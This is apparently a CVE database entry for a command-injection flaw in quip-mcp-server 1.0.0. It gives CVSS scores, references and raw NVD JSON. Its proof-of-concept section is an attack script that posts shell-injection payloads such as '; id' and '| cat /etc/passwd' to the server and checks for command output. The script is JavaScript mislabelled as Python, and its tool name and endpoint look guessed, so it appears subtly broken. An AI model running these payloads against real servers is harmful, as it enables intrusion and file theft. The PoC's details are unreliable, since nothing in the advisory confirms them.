CVE-2026-4192

Description

A vulnerability has been found in AvinashBole quip-mcp-server 1.0.0. Affected by this vulnerability is the function setupToolHandlers of the file src/index.ts. Such manipulation leads to command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

quip-mcp-server <= 1.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-4192 PoC - Command Injection in quip-mcp-server
// Target: AvinashBole/quip-mcp-server 1.0.0
// Vulnerability: Command injection in setupToolHandlers function

const axios = require('axios');

// Malicious payload to inject command
const maliciousPayload = {
  tool: "setupToolHandlers",
  params: {
    // Inject arbitrary command using semicolon separator
    // This will execute 'id' command and display user information
    command: "; id",
    // Alternative: Using command substitution
    // command: "$(whoami)",
    // Alternative: Using pipe to chain commands
    // command: "| cat /etc/passwd"
  }
};

async function exploit(targetUrl) {
  try {
    console.log('[*] Sending malicious request to target...');
    console.log('[*] Payload:', JSON.stringify(maliciousPayload));
    
    // Send the crafted request to the MCP server
    const response = await axios.post(targetUrl + '/api/execute', maliciousPayload, {
      headers: {
        'Content-Type': 'application/json',
        // Low privilege authentication may be required
        'Authorization': 'Bearer <low_privilege_token>'
      },
      timeout: 10000
    });
    
    console.log('[+] Response received:');
    console.log(response.data);
    
    // Check if command was executed
    if (response.data && response.data.output && 
        (response.data.output.includes('uid=') || 
         response.data.output.includes('root'))) {
      console.log('[+] VULNERABLE! Command injection successful!');
      console.log('[+] Executed command output:', response.data.output);
    }
  } catch (error) {
    console.error('[-] Error:', error.message);
    if (error.response) {
      console.error('[-] Response:', error.response.data);
    }
  }
}

// Usage
// Replace TARGET_URL with the actual quip-mcp-server endpoint
// const targetUrl = 'http://target-server:3000';
// exploit(targetUrl);

console.log('CVE-2026-4192 PoC for quip-mcp-server Command Injection');
console.log('This PoC demonstrates how to inject system commands through vulnerable parameter.');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4192
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4192
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4192/
[4] VulDB https://vuldb.com/cve/CVE-2026-4192
[5] https://github.com/AvinashBole/quip-mcp-server/
[6] https://github.com/AvinashBole/quip-mcp-server/issues/4
[7] https://github.com/user-attachments/files/25716541/quip-mcp-server_security_advisory.pdf
[8] https://vuldb.com/?ctiid.351099
[9] https://vuldb.com/?id.351099
[10] https://vuldb.com/?submit.770616

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4192", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:20:02.670", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in AvinashBole quip-mcp-server 1.0.0. Affected by this vulnerability is the function setupToolHandlers of the file src/index.ts. Such manipulation leads to command injection. The attack may be performed from remote. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet."}, {"lang": "es", "value": "Se ha encontrado una vulnerabilidad en AvinashBole quip-mcp-server 1.0.0. Afectada por esta vulnerabilidad es la función setupToolHandlers del archivo src/index.ts. Dicha manipulación conduce a inyección de comandos. El ataque puede ser realizado desde remoto. El exploit ha sido divulgado al público y puede ser utilizado. El proyecto fue informado del problema tempranamente a través de un informe de incidencias, pero no ha respondido aún."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/AvinashBole/quip-mcp-server/", "source": "[email protected]"}, {"url": "https://github.com/AvinashBole/quip-mcp-server/issues/4", "source": "[email protected]"}, {"url": "https://github.com/user-attachments/files/25716541/quip-mcp-server_security_advisory.pdf", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351099", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351099", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.770616", "source": "[email protected]"}]}}